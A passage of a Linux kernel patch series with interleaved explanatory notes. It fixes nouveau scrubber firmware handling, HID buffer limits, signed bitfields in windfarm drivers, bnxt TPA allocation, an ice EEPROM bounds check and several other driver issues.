+ ga100_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&ga100_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&ga100_fb, device, type, inst, pfb);
+ }
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga102.c
+index 5a21b0ae45958..dd476e079fe1c 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga102.c
+@@ -25,25 +25,20 @@
+ #include <engine/nvdec.h>
+ 
+ static int
+-ga102_fb_vpr_scrub(struct nvkm_fb *fb)
++ga102_fb_oneinit(struct nvkm_fb *fb)
+ {
+-	struct nvkm_falcon_fw fw = {};
+-	int ret;
++	struct nvkm_subdev *subdev = &fb->subdev;
+ 
+-	ret = nvkm_falcon_fw_ctor_hs_v2(&ga102_flcn_fw, "mem-unlock", &fb->subdev, "nvdec/scrubber",
+-					0, &fb->subdev.device->nvdec[0]->falcon, &fw);
+-	if (ret)
+-		return ret;
++	nvkm_falcon_fw_ctor_hs_v2(&ga102_flcn_fw, "mem-unlock", subdev, "nvdec/scrubber",
++				  0, &subdev->device->nvdec[0]->falcon, &fb->vpr_scrubber);
+ 
+-	ret = nvkm_falcon_fw_boot(&fw, &fb->subdev, true, NULL, NULL, 0, 0);
+-	nvkm_falcon_fw_dtor(&fw);
+-	return ret;
++	return gf100_fb_oneinit(fb);
+ }
+ 
+ static const struct nvkm_fb_func
+ ga102_fb = {
+ 	.dtor = gf100_fb_dtor,
+-	.oneinit = gf100_fb_oneinit,
++	.oneinit = ga102_fb_oneinit,
+ 	.init = gm200_fb_init,
+ 	.init_page = gv100_fb_init_page,
+ 	.init_unkn = gp100_fb_init_unkn,
+@@ -51,13 +46,13 @@ ga102_fb = {
+ 	.ram_new = ga102_ram_new,
+ 	.default_bigpage = 16,
+ 	.vpr.scrub_required = tu102_fb_vpr_scrub_required,
+-	.vpr.scrub = ga102_fb_vpr_scrub,
++	.vpr.scrub = gp102_fb_vpr_scrub,
+ };
+ 
+ int
+ ga102_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&ga102_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&ga102_fb, device, type, inst, pfb);
+ }
+ 
+ MODULE_FIRMWARE("nvidia/ga102/nvdec/scrubber.bin");
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gp102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gp102.c
+index 2658481d575b6..14d942e8b857f 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gp102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gp102.c
+@@ -29,18 +29,7 @@
+ int
+ gp102_fb_vpr_scrub(struct nvkm_fb *fb)
+ {
+-	struct nvkm_subdev *subdev = &fb->subdev;
+-	struct nvkm_falcon_fw fw = {};
+-	int ret;
+-
+-	ret = nvkm_falcon_fw_ctor_hs(&gm200_flcn_fw, "mem-unlock", subdev, NULL,
+-				     "nvdec/scrubber", 0, &subdev->device->nvdec[0]->falcon, &fw);
+-	if (ret)
+-		return ret;
+-
+-	ret = nvkm_falcon_fw_boot(&fw, subdev, true, NULL, NULL, 0, 0x00000000);
+-	nvkm_falcon_fw_dtor(&fw);
+-	return ret;
++	return nvkm_falcon_fw_boot(&fb->vpr_scrubber, &fb->subdev, true, NULL, NULL, 0, 0x00000000);
+ }
+ 
+ bool
+@@ -51,10 +40,21 @@ gp102_fb_vpr_scrub_required(struct nvkm_fb *fb)
+ 	return (nvkm_rd32(device, 0x100cd0) & 0x00000010) != 0;
+ }
+ 
++int
++gp102_fb_oneinit(struct nvkm_fb *fb)
++{
++	struct nvkm_subdev *subdev = &fb->subdev;
++
++	nvkm_falcon_fw_ctor_hs(&gm200_flcn_fw, "mem-unlock", subdev, NULL, "nvdec/scrubber",
++			       0, &subdev->device->nvdec[0]->falcon, &fb->vpr_scrubber);
++
++	return gf100_fb_oneinit(fb);
++}
++
+ static const struct nvkm_fb_func
+ gp102_fb = {
+ 	.dtor = gf100_fb_dtor,
+-	.oneinit = gf100_fb_oneinit,
++	.oneinit = gp102_fb_oneinit,
+ 	.init = gm200_fb_init,
+ 	.init_remapper = gp100_fb_init_remapper,
+ 	.init_page = gm200_fb_init_page,
+@@ -64,23 +64,10 @@ gp102_fb = {
+ 	.ram_new = gp100_ram_new,
+ };
+ 
+-int
+-gp102_fb_new_(const struct nvkm_fb_func *func, struct nvkm_device *device,
+-	      enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+-{
+-	int ret = gf100_fb_new_(func, device, type, inst, pfb);
+-	if (ret)
+-		return ret;
+-
+-	nvkm_firmware_load_blob(&(*pfb)->subdev, "nvdec/scrubber", "", 0,
+-				&(*pfb)->vpr_scrubber);
+-	return 0;
+-}
+-
+ int
+ gp102_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&gp102_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&gp102_fb, device, type, inst, pfb);
+ }
+ 
+ MODULE_FIRMWARE("nvidia/gp102/nvdec/scrubber.bin");
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gv100.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gv100.c
+index 0e3c0a8f5d716..4d8a286a7a348 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gv100.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/gv100.c
+@@ -31,7 +31,7 @@ gv100_fb_init_page(struct nvkm_fb *fb)
+ static const struct nvkm_fb_func
+ gv100_fb = {
+ 	.dtor = gf100_fb_dtor,
+-	.oneinit = gf100_fb_oneinit,
++	.oneinit = gp102_fb_oneinit,
+ 	.init = gm200_fb_init,
+ 	.init_page = gv100_fb_init_page,
+ 	.init_unkn = gp100_fb_init_unkn,
+@@ -45,7 +45,7 @@ gv100_fb = {
+ int
+ gv100_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&gv100_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&gv100_fb, device, type, inst, pfb);
+ }
+ 
+ MODULE_FIRMWARE("nvidia/gv100/nvdec/scrubber.bin");
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/priv.h b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/priv.h
+index f517751f94acd..726c30c8bf95d 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/priv.h
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/priv.h
+@@ -83,8 +83,7 @@ int gm200_fb_init_page(struct nvkm_fb *);
+ void gp100_fb_init_remapper(struct nvkm_fb *);
+ void gp100_fb_init_unkn(struct nvkm_fb *);
+ 
+-int gp102_fb_new_(const struct nvkm_fb_func *, struct nvkm_device *, enum nvkm_subdev_type, int,
+-		  struct nvkm_fb **);
++int gp102_fb_oneinit(struct nvkm_fb *);
+ bool gp102_fb_vpr_scrub_required(struct nvkm_fb *);
+ int gp102_fb_vpr_scrub(struct nvkm_fb *);
+ 
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/tu102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/tu102.c
+index be82af0364ee4..b8803c124c3b2 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/tu102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/tu102.c
+@@ -31,7 +31,7 @@ tu102_fb_vpr_scrub_required(struct nvkm_fb *fb)
+ static const struct nvkm_fb_func
+ tu102_fb = {
+ 	.dtor = gf100_fb_dtor,
+-	.oneinit = gf100_fb_oneinit,
++	.oneinit = gp102_fb_oneinit,
+ 	.init = gm200_fb_init,
+ 	.init_page = gv100_fb_init_page,
+ 	.init_unkn = gp100_fb_init_unkn,
+@@ -45,7 +45,7 @@ tu102_fb = {
+ int
+ tu102_fb_new(struct nvkm_device *device, enum nvkm_subdev_type type, int inst, struct nvkm_fb **pfb)
+ {
+-	return gp102_fb_new_(&tu102_fb, device, type, inst, pfb);
++	return gf100_fb_new_(&tu102_fb, device, type, inst, pfb);
+ }
+ 
+ MODULE_FIRMWARE("nvidia/tu102/nvdec/scrubber.bin");
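
Taken together, the nouveau hunks turn the scrubber firmware from a build-boot-destroy sequence inside every vpr.scrub call into a constructed-once object in struct nvkm_fb: oneinit loads it, the scrub hook merely boots it, and the subdev destructor frees it (nvkm_fb_mem_unlock forcing nvkm_subdev_oneinit first guarantees the load has happened). A schematic of that lifecycle split, with invented names standing in for the nvkm API:

#include <stdio.h>

struct fw { int loaded; };
struct dev { struct fw scrubber; };

static int fw_ctor(struct fw *fw) { fw->loaded = 1; return 0; }   /* slow: fetch image */
static int fw_boot(struct fw *fw) { return fw->loaded ? 0 : -1; } /* fast: reuse image */
static void fw_dtor(struct fw *fw) { fw->loaded = 0; }

static int dev_oneinit(struct dev *d) { return fw_ctor(&d->scrubber); } /* once */
static int dev_scrub(struct dev *d)   { return fw_boot(&d->scrubber); } /* many */
static void dev_dtor(struct dev *d)   { fw_dtor(&d->scrubber); }        /* once */

int main(void)
{
    struct dev d = { { 0 } };

    if (dev_oneinit(&d))
        return 1;
    printf("scrub #1: %d\n", dev_scrub(&d));
    printf("scrub #2: %d\n", dev_scrub(&d)); /* no firmware reload in between */
    dev_dtor(&d);
    return 0;
}
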
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index 5c72aef3d3dd5..799a3086dbb06 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -261,6 +261,7 @@ static int hid_add_field(struct hid_parser *parser, unsigned report_type, unsign
+ {
+ 	struct hid_report *report;
+ 	struct hid_field *field;
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
+ 	unsigned int usages;
+ 	unsigned int offset;
+ 	unsigned int i;
+@@ -291,8 +292,11 @@ static int hid_add_field(struct hid_parser *parser, unsigned report_type, unsign
+ 	offset = report->size;
+ 	report->size += parser->global.report_size * parser->global.report_count;
+ 
++	if (parser->device->ll_driver->max_buffer_size)
++		max_buffer_size = parser->device->ll_driver->max_buffer_size;
++
+ 	/* Total size check: Allow for possible report index byte */
+-	if (report->size > (HID_MAX_BUFFER_SIZE - 1) << 3) {
++	if (report->size > (max_buffer_size - 1) << 3) {
+ 		hid_err(parser->device, "report is too long\n");
+ 		return -1;
+ 	}
+@@ -1966,6 +1970,7 @@ int hid_report_raw_event(struct hid_device *hid, enum hid_report_type type, u8 *
+ 	struct hid_report_enum *report_enum = hid->report_enum + type;
+ 	struct hid_report *report;
+ 	struct hid_driver *hdrv;
++	int max_buffer_size = HID_MAX_BUFFER_SIZE;
+ 	u32 rsize, csize = size;
+ 	u8 *cdata = data;
+ 	int ret = 0;
+@@ -1981,10 +1986,13 @@ int hid_report_raw_event(struct hid_device *hid, enum hid_report_type type, u8 *
+ 
+ 	rsize = hid_compute_report_size(report);
+ 
+-	if (report_enum->numbered && rsize >= HID_MAX_BUFFER_SIZE)
+-		rsize = HID_MAX_BUFFER_SIZE - 1;
+-	else if (rsize > HID_MAX_BUFFER_SIZE)
+-		rsize = HID_MAX_BUFFER_SIZE;
++	if (hid->ll_driver->max_buffer_size)
++		max_buffer_size = hid->ll_driver->max_buffer_size;
++
++	if (report_enum->numbered && rsize >= max_buffer_size)
++		rsize = max_buffer_size - 1;
++	else if (rsize > max_buffer_size)
++		rsize = max_buffer_size;
+ 
+ 	if (csize < rsize) {
+ 		dbg_hid("report %d is too short, (%d < %d)\n", report->id,
+@@ -2387,7 +2395,12 @@ int hid_hw_raw_request(struct hid_device *hdev,
+ 		       unsigned char reportnum, __u8 *buf,
+ 		       size_t len, enum hid_report_type rtype, enum hid_class_request reqtype)
+ {
+-	if (len < 1 || len > HID_MAX_BUFFER_SIZE || !buf)
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
++
++	if (hdev->ll_driver->max_buffer_size)
++		max_buffer_size = hdev->ll_driver->max_buffer_size;
++
++	if (len < 1 || len > max_buffer_size || !buf)
+ 		return -EINVAL;
+ 
+ 	return hdev->ll_driver->raw_request(hdev, reportnum, buf, len,
+@@ -2406,7 +2419,12 @@ EXPORT_SYMBOL_GPL(hid_hw_raw_request);
+  */
+ int hid_hw_output_report(struct hid_device *hdev, __u8 *buf, size_t len)
+ {
+-	if (len < 1 || len > HID_MAX_BUFFER_SIZE || !buf)
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
++
++	if (hdev->ll_driver->max_buffer_size)
++		max_buffer_size = hdev->ll_driver->max_buffer_size;
++
++	if (len < 1 || len > max_buffer_size || !buf)
+ 		return -EINVAL;
+ 
+ 	if (hdev->ll_driver->output_report)
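
All four hid-core call sites apply the same rule: start from the global HID_MAX_BUFFER_SIZE and tighten it whenever the transport declares a smaller max_buffer_size, as uhid does below with UHID_DATA_MAX. A compact userspace model of the fallback clamp (toy types; the real limit lives in struct hid_ll_driver):

#include <stdio.h>

#define HID_MAX_BUFFER_SIZE 16384 /* global ceiling, as in hid.h */

struct ll_driver {
    unsigned int max_buffer_size; /* 0 means "no transport limit" */
};

static unsigned int effective_max(const struct ll_driver *ll)
{
    return ll->max_buffer_size ? ll->max_buffer_size
                               : HID_MAX_BUFFER_SIZE;
}

int main(void)
{
    struct ll_driver usb = { 0 };     /* keeps the global limit */
    struct ll_driver uhid = { 4096 }; /* e.g. UHID_DATA_MAX */

    printf("%u %u\n", effective_max(&usb), effective_max(&uhid));
    return 0;
}
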
+diff --git a/drivers/hid/uhid.c b/drivers/hid/uhid.c
+index 2a918aeb0af13..59ac757c1d471 100644
+--- a/drivers/hid/uhid.c
++++ b/drivers/hid/uhid.c
+@@ -395,6 +395,7 @@ struct hid_ll_driver uhid_hid_driver = {
+ 	.parse = uhid_hid_parse,
+ 	.raw_request = uhid_hid_raw_request,
+ 	.output_report = uhid_hid_output_report,
++	.max_buffer_size = UHID_DATA_MAX,
+ };
+ EXPORT_SYMBOL_GPL(uhid_hid_driver);
+ 
+diff --git a/drivers/macintosh/windfarm_lm75_sensor.c b/drivers/macintosh/windfarm_lm75_sensor.c
+index 24f0a444d3122..9c6febce2376b 100644
+--- a/drivers/macintosh/windfarm_lm75_sensor.c
++++ b/drivers/macintosh/windfarm_lm75_sensor.c
+@@ -33,8 +33,8 @@
+ #endif
+ 
+ struct wf_lm75_sensor {
+-	int			ds1775 : 1;
+-	int			inited : 1;
++	unsigned int		ds1775 : 1;
++	unsigned int		inited : 1;
+ 	struct i2c_client	*i2c;
+ 	struct wf_sensor	sens;
+ };
+diff --git a/drivers/macintosh/windfarm_smu_sensors.c b/drivers/macintosh/windfarm_smu_sensors.c
+index 00c6fe25fcba0..2bdb73b34d291 100644
+--- a/drivers/macintosh/windfarm_smu_sensors.c
++++ b/drivers/macintosh/windfarm_smu_sensors.c
+@@ -274,8 +274,8 @@ struct smu_cpu_power_sensor {
+ 	struct list_head	link;
+ 	struct wf_sensor	*volts;
+ 	struct wf_sensor	*amps;
+-	int			fake_volts : 1;
+-	int			quadratic : 1;
++	unsigned int		fake_volts : 1;
++	unsigned int		quadratic : 1;
+ 	struct wf_sensor	sens;
+ };
+ #define to_smu_cpu_power(c) container_of(c, struct smu_cpu_power_sensor, sens)
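
Both windfarm fixes are the same portability bug: a plain int single-bit bitfield holds only a sign bit, so after x = 1 it typically reads back as -1 and x == 1 comparisons fail, while unsigned int : 1 holds 0 and 1 as intended. A demonstration (what a signed bitfield yields here is implementation-defined, which is exactly the problem):

#include <stdio.h>

struct s_flags { int x : 1; };          /* sign bit only: 0 or -1 */
struct u_flags { unsigned int x : 1; }; /* 0 or 1 */

int main(void)
{
    struct s_flags s = { .x = 1 };
    struct u_flags u = { .x = 1 };

    printf("signed: %d, unsigned: %u\n", s.x, (unsigned)u.x);
    printf("s.x == 1? %d\n", s.x == 1); /* typically 0 (false) */
    return 0;
}
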
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index c159f297ab92a..16ca9dbf15442 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -3482,7 +3482,7 @@ static int ov5640_init_controls(struct ov5640_dev *sensor)
+ 	/* Auto/manual gain */
+ 	ctrls->auto_gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_AUTOGAIN,
+ 					     0, 1, 1, 1);
+-	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_GAIN,
++	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_ANALOGUE_GAIN,
+ 					0, 1023, 1, 0);
+ 
+ 	ctrls->saturation = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_SATURATION,
+diff --git a/drivers/media/rc/gpio-ir-recv.c b/drivers/media/rc/gpio-ir-recv.c
+index 8f1fff7af6c93..8dbe780dae4e7 100644
+--- a/drivers/media/rc/gpio-ir-recv.c
++++ b/drivers/media/rc/gpio-ir-recv.c
+@@ -126,6 +126,23 @@ static int gpio_ir_recv_probe(struct platform_device *pdev)
+ 				"gpio-ir-recv-irq", gpio_dev);
+ }
+ 
++static int gpio_ir_recv_remove(struct platform_device *pdev)
++{
++	struct gpio_rc_dev *gpio_dev = platform_get_drvdata(pdev);
++	struct device *pmdev = gpio_dev->pmdev;
++
++	if (pmdev) {
++		pm_runtime_get_sync(pmdev);
++		cpu_latency_qos_remove_request(&gpio_dev->qos);
++
++		pm_runtime_disable(pmdev);
++		pm_runtime_put_noidle(pmdev);
++		pm_runtime_set_suspended(pmdev);
++	}
++
++	return 0;
++}
++
+ #ifdef CONFIG_PM
+ static int gpio_ir_recv_suspend(struct device *dev)
+ {
+@@ -185,6 +202,7 @@ MODULE_DEVICE_TABLE(of, gpio_ir_recv_of_match);
+ 
+ static struct platform_driver gpio_ir_recv_driver = {
+ 	.probe  = gpio_ir_recv_probe,
++	.remove = gpio_ir_recv_remove,
+ 	.driver = {
+ 		.name   = KBUILD_MODNAME,
+ 		.of_match_table = of_match_ptr(gpio_ir_recv_of_match),
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 338f238f2043c..003672d71a3bf 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -393,6 +393,24 @@ mt7530_fdb_write(struct mt7530_priv *priv, u16 vid,
+ 		mt7530_write(priv, MT7530_ATA1 + (i * 4), reg[i]);
+ }
+ 
++/* Set up switch core clock for MT7530 */
++static void mt7530_pll_setup(struct mt7530_priv *priv)
++{
++	/* Disable PLL */
++	core_write(priv, CORE_GSWPLL_GRP1, 0);
++
++	/* Set core clock to 500MHz */
++	core_write(priv, CORE_GSWPLL_GRP2,
++		   RG_GSWPLL_POSDIV_500M(1) |
++		   RG_GSWPLL_FBKDIV_500M(25));
++
++	/* Enable PLL */
++	core_write(priv, CORE_GSWPLL_GRP1,
++		   RG_GSWPLL_EN_PRE |
++		   RG_GSWPLL_POSDIV_200M(2) |
++		   RG_GSWPLL_FBKDIV_200M(32));
++}
++
+ /* Setup TX circuit including relevant PAD and driving */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+@@ -453,21 +471,6 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+ 		   REG_GSWCK_EN | REG_TRGMIICK_EN);
+ 
+-	/* Setup core clock for MT7530 */
+-	/* Disable PLL */
+-	core_write(priv, CORE_GSWPLL_GRP1, 0);
+-
+-	/* Set core clock into 500Mhz */
+-	core_write(priv, CORE_GSWPLL_GRP2,
+-		   RG_GSWPLL_POSDIV_500M(1) |
+-		   RG_GSWPLL_FBKDIV_500M(25));
+-
+-	/* Enable PLL */
+-	core_write(priv, CORE_GSWPLL_GRP1,
+-		   RG_GSWPLL_EN_PRE |
+-		   RG_GSWPLL_POSDIV_200M(2) |
+-		   RG_GSWPLL_FBKDIV_200M(32));
+-
+ 	/* Setup the MT7530 TRGMII Tx Clock */
+ 	core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+ 	core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
+@@ -2201,6 +2204,8 @@ mt7530_setup(struct dsa_switch *ds)
+ 		     SYS_CTRL_PHY_RST | SYS_CTRL_SW_RST |
+ 		     SYS_CTRL_REG_RST);
+ 
++	mt7530_pll_setup(priv);
++
+ 	/* Enable Port 6 only; P5 as GMAC5 which currently is not supported */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+diff --git a/drivers/net/ethernet/broadcom/bgmac.c b/drivers/net/ethernet/broadcom/bgmac.c
+index 3038386a5afd8..1761df8fb7f96 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.c
++++ b/drivers/net/ethernet/broadcom/bgmac.c
+@@ -890,13 +890,13 @@ static void bgmac_chip_reset_idm_config(struct bgmac *bgmac)
+ 
+ 		if (iost & BGMAC_BCMA_IOST_ATTACHED) {
+ 			flags = BGMAC_BCMA_IOCTL_SW_CLKEN;
+-			if (!bgmac->has_robosw)
++			if (bgmac->in_init || !bgmac->has_robosw)
+ 				flags |= BGMAC_BCMA_IOCTL_SW_RESET;
+ 		}
+ 		bgmac_clk_enable(bgmac, flags);
+ 	}
+ 
+-	if (iost & BGMAC_BCMA_IOST_ATTACHED && !bgmac->has_robosw)
++	if (iost & BGMAC_BCMA_IOST_ATTACHED && (bgmac->in_init || !bgmac->has_robosw))
+ 		bgmac_idm_write(bgmac, BCMA_IOCTL,
+ 				bgmac_idm_read(bgmac, BCMA_IOCTL) &
+ 				~BGMAC_BCMA_IOCTL_SW_RESET);
+@@ -1490,6 +1490,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	struct net_device *net_dev = bgmac->net_dev;
+ 	int err;
+ 
++	bgmac->in_init = true;
++
+ 	bgmac_chip_intrs_off(bgmac);
+ 
+ 	net_dev->irq = bgmac->irq;
+@@ -1542,6 +1544,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	/* Omit FCS from max MTU size */
+ 	net_dev->max_mtu = BGMAC_RX_MAX_FRAME_SIZE - ETH_FCS_LEN;
+ 
++	bgmac->in_init = false;
++
+ 	err = register_netdev(bgmac->net_dev);
+ 	if (err) {
+ 		dev_err(bgmac->dev, "Cannot register net device\n");
+diff --git a/drivers/net/ethernet/broadcom/bgmac.h b/drivers/net/ethernet/broadcom/bgmac.h
+index e05ac92c06504..d73ef262991d6 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.h
++++ b/drivers/net/ethernet/broadcom/bgmac.h
+@@ -472,6 +472,8 @@ struct bgmac {
+ 	int irq;
+ 	u32 int_mask;
+ 
++	bool in_init;
++
+ 	/* Current MAC state */
+ 	int mac_speed;
+ 	int mac_duplex;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 6c32f5c427b52..25d1642c10c3b 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -3146,7 +3146,7 @@ static int bnxt_alloc_ring(struct bnxt *bp, struct bnxt_ring_mem_info *rmem)
+ 
+ static void bnxt_free_tpa_info(struct bnxt *bp)
+ {
+-	int i;
++	int i, j;
+ 
+ 	for (i = 0; i < bp->rx_nr_rings; i++) {
+ 		struct bnxt_rx_ring_info *rxr = &bp->rx_ring[i];
+@@ -3154,8 +3154,10 @@ static void bnxt_free_tpa_info(struct bnxt *bp)
+ 		kfree(rxr->rx_tpa_idx_map);
+ 		rxr->rx_tpa_idx_map = NULL;
+ 		if (rxr->rx_tpa) {
+-			kfree(rxr->rx_tpa[0].agg_arr);
+-			rxr->rx_tpa[0].agg_arr = NULL;
++			for (j = 0; j < bp->max_tpa; j++) {
++				kfree(rxr->rx_tpa[j].agg_arr);
++				rxr->rx_tpa[j].agg_arr = NULL;
++			}
+ 		}
+ 		kfree(rxr->rx_tpa);
+ 		rxr->rx_tpa = NULL;
+@@ -3164,14 +3166,13 @@ static void bnxt_free_tpa_info(struct bnxt *bp)
+ 
+ static int bnxt_alloc_tpa_info(struct bnxt *bp)
+ {
+-	int i, j, total_aggs = 0;
++	int i, j;
+ 
+ 	bp->max_tpa = MAX_TPA;
+ 	if (bp->flags & BNXT_FLAG_CHIP_P5) {
+ 		if (!bp->max_tpa_v2)
+ 			return 0;
+ 		bp->max_tpa = max_t(u16, bp->max_tpa_v2, MAX_TPA_P5);
+-		total_aggs = bp->max_tpa * MAX_SKB_FRAGS;
+ 	}
+ 
+ 	for (i = 0; i < bp->rx_nr_rings; i++) {
+@@ -3185,12 +3186,12 @@ static int bnxt_alloc_tpa_info(struct bnxt *bp)
+ 
+ 		if (!(bp->flags & BNXT_FLAG_CHIP_P5))
+ 			continue;
+-		agg = kcalloc(total_aggs, sizeof(*agg), GFP_KERNEL);
+-		rxr->rx_tpa[0].agg_arr = agg;
+-		if (!agg)
+-			return -ENOMEM;
+-		for (j = 1; j < bp->max_tpa; j++)
+-			rxr->rx_tpa[j].agg_arr = agg + j * MAX_SKB_FRAGS;
++		for (j = 0; j < bp->max_tpa; j++) {
++			agg = kcalloc(MAX_SKB_FRAGS, sizeof(*agg), GFP_KERNEL);
++			if (!agg)
++				return -ENOMEM;
++			rxr->rx_tpa[j].agg_arr = agg;
++		}
+ 		rxr->rx_tpa_idx_map = kzalloc(sizeof(*rxr->rx_tpa_idx_map),
+ 					      GFP_KERNEL);
+ 		if (!rxr->rx_tpa_idx_map)
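
The bnxt change replaces one MAX_SKB_FRAGS-strided slab owned by entry 0 -- with entries 1..max_tpa-1 pointing into it -- by an independent kcalloc() per TPA entry, freed symmetrically. That removes the hidden ownership rule the old kfree(rxr->rx_tpa[0].agg_arr) relied on. A reduced userspace sketch of the new ownership (sizes are stand-ins):

#include <stdlib.h>

#define MAX_AGGS 17 /* stand-in for MAX_SKB_FRAGS */

struct tpa_info { int *agg_arr; };

/* after the patch: each entry owns its own array ... */
static int alloc_tpa(struct tpa_info *tpa, int n)
{
    int i;

    for (i = 0; i < n; i++) {
        tpa[i].agg_arr = calloc(MAX_AGGS, sizeof(int));
        if (!tpa[i].agg_arr)
            return -1;
    }
    return 0;
}

/* ... and freeing walks every entry instead of only entry 0 */
static void free_tpa(struct tpa_info *tpa, int n)
{
    int i;

    for (i = 0; i < n; i++) {
        free(tpa[i].agg_arr);
        tpa[i].agg_arr = NULL;
    }
}

int main(void)
{
    struct tpa_info tpa[8] = { 0 };

    alloc_tpa(tpa, 8); /* on partial failure, free_tpa() still cleans up */
    free_tpa(tpa, 8);
    return 0;
}
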
+diff --git a/drivers/net/ethernet/intel/ice/ice_dcb.c b/drivers/net/ethernet/intel/ice/ice_dcb.c
+index 6be02f9b0b8c2..789b99963910d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_dcb.c
++++ b/drivers/net/ethernet/intel/ice/ice_dcb.c
+@@ -1372,7 +1372,7 @@ ice_add_dscp_pfc_tlv(struct ice_lldp_org_tlv *tlv, struct ice_dcbx_cfg *dcbcfg)
+ 	tlv->ouisubtype = htonl(ouisubtype);
+ 
+ 	buf[0] = dcbcfg->pfc.pfccap & 0xF;
+-	buf[1] = dcbcfg->pfc.pfcena & 0xF;
++	buf[1] = dcbcfg->pfc.pfcena;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+index a359f1610fc19..8ca61610cec23 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+@@ -4314,6 +4314,8 @@ ice_get_module_eeprom(struct net_device *netdev,
+ 		 * SFP modules only ever use page 0.
+ 		 */
+ 		if (page == 0 || !(data[0x2] & 0x4)) {
++			u32 copy_len;
++
+ 			/* If i2c bus is busy due to slow page change or
+ 			 * link management access, call can fail. This is normal.
+ 			 * So we retry this a few times.
+@@ -4337,8 +4339,8 @@ ice_get_module_eeprom(struct net_device *netdev,
+ 			}
+ 
+ 			/* Make sure we have enough room for the new block */
+-			if ((i + SFF_READ_BLOCK_SIZE) < ee->len)
+-				memcpy(data + i, value, SFF_READ_BLOCK_SIZE);
++			copy_len = min_t(u32, SFF_READ_BLOCK_SIZE, ee->len - i);
++			memcpy(data + i, value, copy_len);
+ 		}
+ 	}
+ 	return 0;
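
The old guard silently dropped the final partial block -- and, being < rather than <=, even a block that exactly filled the buffer -- while the fix clamps the copy length to the room that remains. The shape of the loop, standalone (buffer sizes invented):

#include <stdio.h>
#include <string.h>

#define BLOCK 8 /* stand-in for SFF_READ_BLOCK_SIZE */

int main(void)
{
    unsigned char src[BLOCK] = "ABCDEFGH";
    unsigned char dst[20] = { 0 };
    unsigned int len = sizeof(dst), i;

    for (i = 0; i < len; i += BLOCK) {
        /* min_t(u32, BLOCK, len - i): never write past dst + len */
        unsigned int copy_len = BLOCK < len - i ? BLOCK : len - i;

        memcpy(dst + i, src, copy_len);
    }
    printf("last chunk copied %u bytes\n", len % BLOCK); /* 4 */
    return 0;
}
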
